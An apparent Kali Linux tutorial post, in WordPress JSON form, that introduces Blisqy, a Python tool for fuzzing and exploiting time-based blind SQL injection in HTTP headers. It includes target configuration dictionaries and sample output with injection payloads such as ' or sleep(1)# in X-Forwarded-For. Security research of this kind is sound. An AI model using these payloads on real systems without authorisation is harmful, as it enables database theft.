{"id":5536,"date":"2019-06-29T18:59:44","date_gmt":"2019-06-29T13:29:44","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=5536"},"modified":"2019-06-29T18:59:44","modified_gmt":"2019-06-29T13:29:44","slug":"blisqy-sql-injection-http-headers","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/","title":{"rendered":"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers"},"content":{"rendered":"\n

Blisqy<\/strong> is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.<\/p>\n\n\n\n

The exploitation enables slow data siphon from a database (currently supports MySQL\/MariaDB only) using bitwise operation on printable ASCII characters, via a blind-SQL injection.<\/p>\n\n\n\n

For interoperability with other Python tools and to enable other users utilise the features provided in Blisqy, the modules herein can be imported into other Python based scripts.<\/p>\n\n\n\n

When testing for Time-based Blind SQL injections, any network lag or congestion can affect the effectiveness of your fuzzing or exploitation. <\/p>\n\n\n\n

To compensate for the possible network lags and uncertainties that might cause delays, Blisqy time comparison is dynamic and it’s calculated at runtime for each test. <\/p>\n\n\n\n

The tests utilizes greenlet<\/code>(alight-weight cooperatively-scheduled execution unit) to provide a high-level synchronous API on top of libevevent<\/code> loop. <\/p>\n\n\n\n

It provides a fast and efficient way of carrying out the payload tests in a short time, also, one particular test should not affect another because they are not fully done in a sequential method.<\/p>\n\n\n\n

It now supports fuzzing for Time-based Blind SQL Injection on HTTP Headers and the main functionalities (fuzzing and exploitation) separated to independent files for portability. <\/p>\n\n\n\n

Also Read – Vulnx : An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS<\/a><\/strong><\/p>\n\n\n\n

Fuzzing with Blisqy<\/strong><\/p>\n\n\n\n

To use the Fuzzing functionality, import the following module in your Python script and provide a target along with the fuzzing data as shown below:<\/p>\n\n\n\n

from lib.blindfuzzer import blindSeeker<\/p>\n\n\n\n

Target parameters should be in a Dictionary\/JSON format, for example (Note the variable data-types)<\/em>:<\/p>\n\n\n\n

Server = ‘192.168.56.101’
Port = 80
Index = 1
Method = ‘GET’
Headerfile = “fuzz-data\/headers\/default_headers.txt”
Injectionfile = “fuzz-data\/payloads\/mysql_time.txt”
target_params = {
\n ‘server’: Server,
\n ‘port’: Port,
\n ‘index’: Index,
\n ‘headersFile’: Headerfile,
\n ‘injectionFile’: Injectionfile,
\n ‘method’: Method
\n}<\/p>\n\n\n\n

Invoking the fuzzer once the target parameters are provided is as shown below :<\/p>\n\n\n\n

vulns = blindSeeker(target_params)
vulns.fuzz()<\/p>\n\n\n\n

You can checkout FindBlindSpot.py<\/code> for this example provided.<\/p>\n\n\n\n

Sample Fuzzing Output<\/strong><\/p>\n\n\n\n

If you are successful, you should get a report of the ‘injectable’ tests carried out. Please note, as much as Blisqy tries to compensate for network lags and congestion while testing it’s is important to proof-test the reported positive tests before proceeding.<\/p>\n\n\n\n

Below is a sample report:<\/p>\n\n\n\n

=================== [ Key Terms] ===================
Index = Configured Constant (Delay)
Base Index Record = Server Ping Before Fuzzing
Benching Record = Base Index Record + Index
Fuzzing Record = Time taken to process request with Index
===================== [ Logic] =====================
If Fuzzing Record is greater than Benching Record,
treat as a positive; else, treat as a negative.

[+] Injection : X-Forwarded-For : ‘ or sleep(1)#

[+] Header : X-Forwarded-For

[] Index Record : 0.000160932540894 [<\/em>] Benching Record : 1.00016093254
[*] Fuzzing Record : 9.01
[!] Test 436 is Injectable.
—————————————————————————————-
[+] Injection : X-Forwarded-For : ‘ or sleep(1)=’
[+] Header : X-Forwarded-For

[] Index Record : 0.000378847122192 [<\/em>] Benching Record : 1.00037884712
[*] Fuzzing Record : 18.02
[!] Test 438 is Injectable.
—————————————————————————————<\/p>\n\n\n\n

Exploitation with Blisqy<\/strong><\/p>\n\n\n\n

After finding a potential Time-based Blind SQL injection, you can prepare a script to Exploit the vulnerable Web application.<\/p>\n\n\n\n

Just as the fuzzer, you can import the module for exploitation in your Python script and define a template for the exploitation operation. Below is an example of how to import the module in a Python script:<\/p>\n\n\n\n

from lib.blindexploit import SqlEngine<\/p>\n\n\n\n

Next, you will need to provide details of your target along with it’s target parameters for exploitation. Below is a sample implementation of exploiting the found blind sql injection found by the fuzzer:<\/p>\n\n\n\n

The target data should be in a Dictionary\/JSON format specifying the server, port, the found vulnerable header and it’s value (some applications will need or check for a certain value). Also Note the variable data-types<\/em>.<\/p>\n\n\n\n

target = {
\n ‘server’: ‘192.168.56.101’,
\n ‘port’: 80,
\n ‘vulnHeader’: ‘X-Forwarded-For’,
\n ‘headerValue’: ‘fuzzer’
\n}<\/p>\n\n\n\n

Target parameters should follow allowing the user to specify some options related to the exploitation preferences.<\/p>\n\n\n\n

targetParam = {
\n ‘sleepTime’: 0.1,
\n ‘payload’: ‘pass’,
\n ‘mysqlDig’: ‘yes’,
\n ‘interactive’: ‘on’,
\n ‘verbosity’: ‘high’
\n}<\/p>\n\n\n\n